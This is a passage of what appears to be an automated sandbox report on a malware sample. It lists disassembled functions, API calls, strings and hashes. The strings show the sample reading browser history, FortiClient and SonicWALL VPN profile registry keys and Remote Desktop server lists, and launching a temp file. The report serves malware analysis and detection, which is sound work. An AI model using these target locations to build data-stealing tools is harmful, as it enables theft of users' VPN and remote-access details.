Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32 ref: 00007FF6DFE2FA70
lstrcatW.KERNEL32 ref: 00007FF6DFE2FA80
lstrcatW.KERNEL32 ref: 00007FF6DFE2FA90
lstrcatW.KERNEL32 ref: 00007FF6DFE2FAA4

Part of subcall function 00007FF6DFE2FF50: lstrlenW.KERNEL32 ref: 00007FF6DFE2FF76
Part of subcall function 00007FF6DFE2FF50: lstrlenW.KERNEL32 ref: 00007FF6DFE2FF92
Part of subcall function 00007FF6DFE2FF50: WideCharToMultiByte.KERNEL32 ref: 00007FF6DFE2FFBB
Part of subcall function 00007FF6DFE2FF50: PathFileExistsA.SHLWAPI ref: 00007FF6DFE2FFC4
Part of subcall function 00007FF6DFE2FF50: OpenFile.KERNEL32 ref: 00007FF6DFE2FFDD
Part of subcall function 00007FF6DFE2FF50: GetFileSize.KERNEL32 ref: 00007FF6DFE2FFFD
Part of subcall function 00007FF6DFE2FF50: CreateFileMappingA.KERNEL32 ref: 00007FF6DFE30034
Part of subcall function 00007FF6DFE2FF50: MapViewOfFile.KERNEL32 ref: 00007FF6DFE30055
Part of subcall function 00007FF6DFE2FF50: __memcpy.DELAYIMP ref: 00007FF6DFE30067
Part of subcall function 00007FF6DFE2FF50: UnmapViewOfFile.KERNEL32 ref: 00007FF6DFE30072
Part of subcall function 00007FF6DFE2FF50: CloseHandle.KERNEL32 ref: 00007FF6DFE3007B
Part of subcall function 00007FF6DFE2FF50: CloseHandle.KERNEL32 ref: 00007FF6DFE30084

Part of subcall function 00007FF6DFE2F294: __memcpy.DELAYIMP ref: 00007FF6DFE2F2B2

Part of subcall function 00007FF6DFE225B4: GetProcessHeap.KERNEL32 ref: 00007FF6DFE225C1
Part of subcall function 00007FF6DFE225B4: RtlFreeHeap.NTDLL ref: 00007FF6DFE225CF

lstrlenW.KERNEL32 ref: 00007FF6DFE2FB13

Strings

\History, xrefs: 00007FF6DFE2FA96
LOCALAPPDATA, xrefs: 00007FF6DFE2FA69
Default, xrefs: 00007FF6DFE2F9BE

Memory Dump Source

Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true

Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd

Similarity

API ID: File$lstrcatlstrlen$CloseHandleHeapView__memcpy$ByteCharCreateEnvironmentExistsFreeMappingMultiOpenPathProcessSizeUnmapVariableWide
String ID: Default$LOCALAPPDATA$\History
API String ID: 3980575106-3555721359
Opcode ID: e458c9bbc1e433a6070e94e619f8eddafc94a087af4b5de136e6cc17d609cf52
Instruction ID: 78610f7056e2db72e8a69055584e56a5b3543ef23e53b943018616d7b2acf7db
Opcode Fuzzy Hash: e458c9bbc1e433a6070e94e619f8eddafc94a087af4b5de136e6cc17d609cf52
Instruction Fuzzy Hash: 94515322E18FC692E750DF24D9452AC7370F7D8784F45A222DA8D93666EF79E6D8C300

Function 00007FF6DFE2FC84 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 89comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00007FF6DFE2FC9D
CoCreateInstance.OLE32 ref: 00007FF6DFE2FCC0
CoUninitialize.OLE32 ref: 00007FF6DFE2FDD7

Strings

http, xrefs: 00007FF6DFE2FD82

Memory Dump Source

Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true

Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize
String ID: http
API String ID: 948891078-2541227442
Opcode ID: 4c8b6a515aa789ec0d19bb8bf84febe21972d20bffd274fdd8ef13372bcd39a7
Instruction ID: 7772587fe3116c1bbfc7a6f47c11c647b6218dbe891156532126ae1b799ff0a2
Opcode Fuzzy Hash: 4c8b6a515aa789ec0d19bb8bf84febe21972d20bffd274fdd8ef13372bcd39a7
Instruction Fuzzy Hash: CF414F32B08A86E5E7209F65E4543ED63A1FBC4B89F044137DA4ECAA68DF3DD564C740

Function 00007FF6DFE29478 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 81timesynchronizationCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF6DFE294BF
WaitForSingleObject.KERNEL32 ref: 00007FF6DFE29505
GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF6DFE29517
TerminateProcess.KERNEL32 ref: 00007FF6DFE2953A

Part of subcall function 00007FF6DFE2968C: PeekNamedPipe.KERNELBASE ref: 00007FF6DFE296B8

GetExitCodeProcess.KERNEL32 ref: 00007FF6DFE29585
CloseHandle.KERNEL32 ref: 00007FF6DFE29593

Strings

exit, xrefs: 00007FF6DFE29482

Memory Dump Source

Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true

Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd

Similarity

API ID: Time$FileProcessSystem$CloseCodeExitHandleNamedObjectPeekPipeSingleTerminateWait
String ID: exit
API String ID: 1626563136-1626635026
Opcode ID: ff8a8709f52c0e2c2161a494e7b9dca54c99b42b1022dffa2c81801740ef66ac
Instruction ID: c48441c126827c1cc33d2206f2d1e2a175f3f5e546506384b5f2a2154bd05c1e
Opcode Fuzzy Hash: ff8a8709f52c0e2c2161a494e7b9dca54c99b42b1022dffa2c81801740ef66ac
Instruction Fuzzy Hash: 6B316F21A09643A1EB60DF35D4942BD23A1FFC4B88F542033E90EC75A9EF2DD865D350

Function 00007FF6DFE21EEC Relevance: 12.2, APIs: 8, Instructions: 152commemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6DFE21DE8: RegCreateKeyExA.ADVAPI32 ref: 00007FF6DFE21E35

CoInitializeEx.OLE32 ref: 00007FF6DFE21F1E
VariantInit.OLEAUT32 ref: 00007FF6DFE21F28
CoCreateInstance.OLE32 ref: 00007FF6DFE21F50
SysAllocString.OLEAUT32 ref: 00007FF6DFE21F61
SafeArrayCreateVector.OLEAUT32 ref: 00007FF6DFE21F7D
SafeArrayAccessData.OLEAUT32 ref: 00007FF6DFE21F93
SafeArrayUnaccessData.OLEAUT32 ref: 00007FF6DFE21FAC
SysFreeString.OLEAUT32 ref: 00007FF6DFE22111

Part of subcall function 00007FF6DFE21CBC: GetTempPathA.KERNEL32 ref: 00007FF6DFE21CF7
Part of subcall function 00007FF6DFE21CBC: GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF6DFE21D04
Part of subcall function 00007FF6DFE21CBC: wsprintfA.USER32 ref: 00007FF6DFE21D1C
Part of subcall function 00007FF6DFE21CBC: CreateFileA.KERNEL32 ref: 00007FF6DFE21D56
Part of subcall function 00007FF6DFE21CBC: WriteFile.KERNEL32 ref: 00007FF6DFE21D88
Part of subcall function 00007FF6DFE21CBC: CloseHandle.KERNEL32 ref: 00007FF6DFE21DA9
Part of subcall function 00007FF6DFE21CBC: ShellExecuteA.SHELL32 ref: 00007FF6DFE21DCE

Memory Dump Source

Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true

Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd

Similarity

API ID: Create$ArrayFileSafe$DataStringTime$AccessAllocCloseExecuteFreeHandleInitInitializeInstancePathShellSystemTempUnaccessVariantVectorWritewsprintf
String ID:
API String ID: 1750269033-0
Opcode ID: 1c5d2654c08cc8127abb35339070594f2d16baf8560606254011173d46aa1ed8
Instruction ID: 67812bd1e344177493591b555ecb94f8c245b87f5910f7c56f9d1fdb4ef868c7
Opcode Fuzzy Hash: 1c5d2654c08cc8127abb35339070594f2d16baf8560606254011173d46aa1ed8
Instruction Fuzzy Hash: 54611B26B08A06A5EB109F65D4543AD23A1FB88B89F448136DE0DD7B68EF3ED619C350

Function 00007FF6DFE2F11C Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6DFE225DC: GetProcessHeap.KERNEL32(?,?,?,00007FF6DFE21985,?,?,?,00007FF6DFE2155F), ref: 00007FF6DFE225E5

__memcpy.DELAYIMP ref: 00007FF6DFE2F1A3

Part of subcall function 00007FF6DFE30128: __memcpy.DELAYIMP ref: 00007FF6DFE30159
Part of subcall function 00007FF6DFE30128: __memcpy.DELAYIMP ref: 00007FF6DFE30167

Part of subcall function 00007FF6DFE2EBA8: lstrlenA.KERNEL32 ref: 00007FF6DFE2EBC5

Part of subcall function 00007FF6DFE225B4: GetProcessHeap.KERNEL32 ref: 00007FF6DFE225C1
Part of subcall function 00007FF6DFE225B4: RtlFreeHeap.NTDLL ref: 00007FF6DFE225CF

Strings

last_visit_time, xrefs: 00007FF6DFE2F1FF
urls, xrefs: 00007FF6DFE2F16C
table, xrefs: 00007FF6DFE2F14E
url, xrefs: 00007FF6DFE2F1EC

Memory Dump Source

Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true

Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd

Similarity

API ID: Heap__memcpy$Process$Freelstrlen
String ID: last_visit_time$table$url$urls
API String ID: 2336645791-3896411411
Opcode ID: 744dd99e044302d5fe6d407e5c776aa4f2f8f712bbe73ab7b054d3950afb3704
Instruction ID: fca62be55d55b1ae2c49186e959ba5f790bb6a9f75c72cbcbcd9d8b59a356807
Opcode Fuzzy Hash: 744dd99e044302d5fe6d407e5c776aa4f2f8f712bbe73ab7b054d3950afb3704
Instruction Fuzzy Hash: B5316262B086C3A1EE709B26E8405BEA350BBC5BD0F404133DE8E877A5EE7DE565C700

Function 00007FF6DFE2EEF0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6DFE225DC: GetProcessHeap.KERNEL32(?,?,?,00007FF6DFE21985,?,?,?,00007FF6DFE2155F), ref: 00007FF6DFE225E5

__memcpy.DELAYIMP ref: 00007FF6DFE2EF77

Part of subcall function 00007FF6DFE30128: __memcpy.DELAYIMP ref: 00007FF6DFE30159
Part of subcall function 00007FF6DFE30128: __memcpy.DELAYIMP ref: 00007FF6DFE30167

Part of subcall function 00007FF6DFE2EBA8: lstrlenA.KERNEL32 ref: 00007FF6DFE2EBC5

Part of subcall function 00007FF6DFE225B4: GetProcessHeap.KERNEL32 ref: 00007FF6DFE225C1
Part of subcall function 00007FF6DFE225B4: RtlFreeHeap.NTDLL ref: 00007FF6DFE225CF

Strings

moz_places, xrefs: 00007FF6DFE2EF40
table, xrefs: 00007FF6DFE2EF22
last_visit_date, xrefs: 00007FF6DFE2EFD3
url, xrefs: 00007FF6DFE2EFC0

Memory Dump Source

Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true

Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd

Similarity

API ID: Heap__memcpy$Process$Freelstrlen
String ID: last_visit_date$moz_places$table$url
API String ID: 2336645791-66087218
Opcode ID: c83cf086847f79ee1b897310ee07e54d52266562039ffac1bc092bc0328fa8d9
Instruction ID: 579a18d29d8533dd25ec428700646ea8f20681c00f7940baf21cdcd9bafbf7c7
Opcode Fuzzy Hash: c83cf086847f79ee1b897310ee07e54d52266562039ffac1bc092bc0328fa8d9
Instruction Fuzzy Hash: A63144627086C3A1EE709B26E8405AE6351BBC47D4F448033DE4EC7795EE7ED965C700

Function 00007FF6DFE2ECD0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6DFE225DC: GetProcessHeap.KERNEL32(?,?,?,00007FF6DFE21985,?,?,?,00007FF6DFE2155F), ref: 00007FF6DFE225E5

__memcpy.DELAYIMP ref: 00007FF6DFE2ED57

Part of subcall function 00007FF6DFE30128: __memcpy.DELAYIMP ref: 00007FF6DFE30159
Part of subcall function 00007FF6DFE30128: __memcpy.DELAYIMP ref: 00007FF6DFE30167

Part of subcall function 00007FF6DFE2EBA8: lstrlenA.KERNEL32 ref: 00007FF6DFE2EBC5

Part of subcall function 00007FF6DFE225B4: GetProcessHeap.KERNEL32 ref: 00007FF6DFE225C1
Part of subcall function 00007FF6DFE225B4: RtlFreeHeap.NTDLL ref: 00007FF6DFE225CF

Strings

last_visit_time, xrefs: 00007FF6DFE2EDB3
urls, xrefs: 00007FF6DFE2ED20
table, xrefs: 00007FF6DFE2ED02
url, xrefs: 00007FF6DFE2EDA0

Memory Dump Source

Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true

Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd

Similarity

API ID: Heap__memcpy$Process$Freelstrlen
String ID: last_visit_time$table$url$urls
API String ID: 2336645791-3896411411
Opcode ID: f46eba84160fcf9a921103440b15831abed8088731bca9a3dad6bc0032e989e1
Instruction ID: ce7dd3363f503d32b814050326334171222938ab1628488e84766a65863ef12f
Opcode Fuzzy Hash: f46eba84160fcf9a921103440b15831abed8088731bca9a3dad6bc0032e989e1
Instruction Fuzzy Hash: 01316F62608693A1EA709F26E8501AE6360BBC4BD0F448033DE8EC7795FE7DE965C700

Function 00007FF6DFE2E3C0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 64stringCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32 ref: 00007FF6DFE2E3F0
PathAppendW.SHLWAPI ref: 00007FF6DFE2E3FE

Strings

Software\Fortinet\FortiClient\Sslvpn\Tunnels, xrefs: 00007FF6DFE2E3E4
":", xrefs: 00007FF6DFE2E495
"},, xrefs: 00007FF6DFE2E4B3

Memory Dump Source

Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true

Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd

Similarity

API ID: AppendPathlstrcpy
String ID: ":"$"},$Software\Fortinet\FortiClient\Sslvpn\Tunnels
API String ID: 3043196718-4231764533
Opcode ID: 8ac59f02cab71109790e32571a4a62e77d6df544d34a991c1123c13a25c48b9f
Instruction ID: 0f41876b8e9390b048eae397da2bb1006815321d168ec1eaea0afadfb2b25053
Opcode Fuzzy Hash: 8ac59f02cab71109790e32571a4a62e77d6df544d34a991c1123c13a25c48b9f
Instruction Fuzzy Hash: BE31B171A08A82A1EA20DF26E8041ED63A1FBC9BC0F544137EE5D877A9EF3DD654C700

Function 00007FF6DFE21DE8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.ADVAPI32 ref: 00007FF6DFE21E35
RegSetValueExA.ADVAPI32 ref: 00007FF6DFE21EBE
RegCloseKey.ADVAPI32 ref: 00007FF6DFE21ED1

Strings

?, xrefs: 00007FF6DFE21E29

Memory Dump Source

Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true

Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd

Similarity

API ID: CloseCreateValue
String ID: ?
API String ID: 1818849710-1684325040
Opcode ID: 9991356b7498287312f88da342bdb997c34c5fd73bb145adfbb6ac68193af689
Instruction ID: 7052a1b869ef5a37919b6b19872e4023ab9f629fae2642180f984beaf392b323
Opcode Fuzzy Hash: 9991356b7498287312f88da342bdb997c34c5fd73bb145adfbb6ac68193af689
Instruction Fuzzy Hash: 9921C473A14780AAE7208F71A8402ED7BB4FB89798B544226EA8C83B59DF3CC154CB00

Function 00007FF6DFE2E618 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45stringCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32 ref: 00007FF6DFE2E637
PathAppendW.SHLWAPI ref: 00007FF6DFE2E645

Part of subcall function 00007FF6DFE2CD0C: RegGetValueW.ADVAPI32 ref: 00007FF6DFE2CD4B
Part of subcall function 00007FF6DFE2CD0C: RegGetValueW.ADVAPI32 ref: 00007FF6DFE2CD8A

Part of subcall function 00007FF6DFE225B4: GetProcessHeap.KERNEL32 ref: 00007FF6DFE225C1
Part of subcall function 00007FF6DFE225B4: RtlFreeHeap.NTDLL ref: 00007FF6DFE225CF

Strings

Software\SonicWALL\SSL-VPN NetExtender\Standalone\Profiles, xrefs: 00007FF6DFE2E62B
"},, xrefs: 00007FF6DFE2E6C3

Memory Dump Source

Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true

Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd

Similarity

API ID: HeapValue$AppendFreePathProcesslstrcpy
String ID: "},$Software\SonicWALL\SSL-VPN NetExtender\Standalone\Profiles
API String ID: 784796242-1893226844
Opcode ID: 6de241257080d24fefd68c1b8e26bb5bf50d8cf1b3b9d4444734eb6179e3eb24
Instruction ID: be9448548f7037006387987e6668a2fe11193282b0b9fe50b37f82d03c838f51
Opcode Fuzzy Hash: 6de241257080d24fefd68c1b8e26bb5bf50d8cf1b3b9d4444734eb6179e3eb24
Instruction Fuzzy Hash: 1C11FE51A0858370E930EB16E8592FE5361EFC57C4F445133EA5EC76AAEE2DD654C700

Function 00007FF6DFE2CC08 Relevance: 6.1, APIs: 4, Instructions: 61registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 00007FF6DFE2CC4D
RegEnumKeyExW.ADVAPI32 ref: 00007FF6DFE2CC87
RegEnumKeyExW.ADVAPI32 ref: 00007FF6DFE2CCD6
RegCloseKey.ADVAPI32 ref: 00007FF6DFE2CCE5

Memory Dump Source

Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true

Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd

Similarity

API ID: Enum$CloseOpen
String ID:
API String ID: 1701607978-0
Opcode ID: fcc6f3c639ec119cf7856154b92cbb5a973dd3f81707c5291cfa5e09fa2fda6b
Instruction ID: 546bde0e54d88eb045526d1d6c98f5cb0ca5cdf69823badc66f305327e66eae7
Opcode Fuzzy Hash: fcc6f3c639ec119cf7856154b92cbb5a973dd3f81707c5291cfa5e09fa2fda6b
Instruction Fuzzy Hash: 69213832618B8592D7208F55E48476EB7B9F7C8B84F154226EA8C87B28DF3DD569CB00

Function 00007FF6DFE2E4E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65stringCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32 ref: 00007FF6DFE2E514
PathAppendW.SHLWAPI ref: 00007FF6DFE2E522

Part of subcall function 00007FF6DFE2CD0C: RegGetValueW.ADVAPI32 ref: 00007FF6DFE2CD4B
Part of subcall function 00007FF6DFE2CD0C: RegGetValueW.ADVAPI32 ref: 00007FF6DFE2CD8A

Strings

Software\Microsoft\Terminal Server Client\Servers, xrefs: 00007FF6DFE2E508

Memory Dump Source

Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true

Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd

Similarity

API ID: Value$AppendPathlstrcpy
String ID: Software\Microsoft\Terminal Server Client\Servers
API String ID: 19203174-1233151749
Opcode ID: eaec5d34d5b1285c908dcaed520bcbaceea3f8c2caac3e5b03989552e05d685a
Instruction ID: 1bb4c7e59c123b4e3f0eb12b7065c19729293061faa91c5ab296efd472911211
Opcode Fuzzy Hash: eaec5d34d5b1285c908dcaed520bcbaceea3f8c2caac3e5b03989552e05d685a
Instruction Fuzzy Hash: 1D218162618A83A5DA30AF62D8152FD6351FBC8BC4F444137EA5DCB79AEE3DD214C700

Function 00007FF6DFE2FDF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32 ref: 00007FF6DFE2FE25
lstrcatW.KERNEL32 ref: 00007FF6DFE2FE32

Part of subcall function 00007FF6DFE2FF50: lstrlenW.KERNEL32 ref: 00007FF6DFE2FF76
Part of subcall function 00007FF6DFE2FF50: lstrlenW.KERNEL32 ref: 00007FF6DFE2FF92
Part of subcall function 00007FF6DFE2FF50: WideCharToMultiByte.KERNEL32 ref: 00007FF6DFE2FFBB
Part of subcall function 00007FF6DFE2FF50: PathFileExistsA.SHLWAPI ref: 00007FF6DFE2FFC4
Part of subcall function 00007FF6DFE2FF50: OpenFile.KERNEL32 ref: 00007FF6DFE2FFDD
Part of subcall function 00007FF6DFE2FF50: GetFileSize.KERNEL32 ref: 00007FF6DFE2FFFD
Part of subcall function 00007FF6DFE2FF50: CreateFileMappingA.KERNEL32 ref: 00007FF6DFE30034
Part of subcall function 00007FF6DFE2FF50: MapViewOfFile.KERNEL32 ref: 00007FF6DFE30055
Part of subcall function 00007FF6DFE2FF50: __memcpy.DELAYIMP ref: 00007FF6DFE30067
Part of subcall function 00007FF6DFE2FF50: UnmapViewOfFile.KERNEL32 ref: 00007FF6DFE30072
Part of subcall function 00007FF6DFE2FF50: CloseHandle.KERNEL32 ref: 00007FF6DFE3007B
Part of subcall function 00007FF6DFE2FF50: CloseHandle.KERNEL32 ref: 00007FF6DFE30084

Part of subcall function 00007FF6DFE2F294: __memcpy.DELAYIMP ref: 00007FF6DFE2F2B2

Part of subcall function 00007FF6DFE225B4: GetProcessHeap.KERNEL32 ref: 00007FF6DFE225C1
Part of subcall function 00007FF6DFE225B4: RtlFreeHeap.NTDLL ref: 00007FF6DFE225CF

Strings

APPDATA, xrefs: 00007FF6DFE2FE1E

Memory Dump Source

Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true

Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd

Similarity

API ID: File$CloseHandleHeapView__memcpylstrlen$ByteCharCreateEnvironmentExistsFreeMappingMultiOpenPathProcessSizeUnmapVariableWidelstrcat
String ID: APPDATA
API String ID: 2395011915-4054820676
Opcode ID: 87c3b692c552a36e5dcac7bbf7354c32fc86ccac0c10c444158e78578eef65e3
Instruction ID: 8c609eaaeaabdafebbffba4f7c5197a53a0f116d1e31bd9ae744c392dc71c051
Opcode Fuzzy Hash: 87c3b692c552a36e5dcac7bbf7354c32fc86ccac0c10c444158e78578eef65e3
Instruction Fuzzy Hash: E8114F22728AC3E1EB20DB10E8445EEA361FBC4784F844033EA8D87A59EF7DD618C740

Analysis Process: explorer.exePID: 6580, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	3.6%
Dynamic/Decrypted Code Coverage:	47.8%
Signature Coverage:	3.6%
Total number of Nodes:	694
Total number of Limit Nodes:	80

Executed Functions

Function 006E3717 Relevance: 45.9, APIs: 19, Strings: 7, Instructions: 401
stringfileencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006E1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,006E2893,00000000,00000000,00000000,?), ref: 006E1B82
Part of subcall function 006E1B6A: CloseHandle.KERNELBASE(00000000), ref: 006E1B8F

GetTempPathW.KERNEL32(00000104,00000000), ref: 006E3778
GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 006E3782
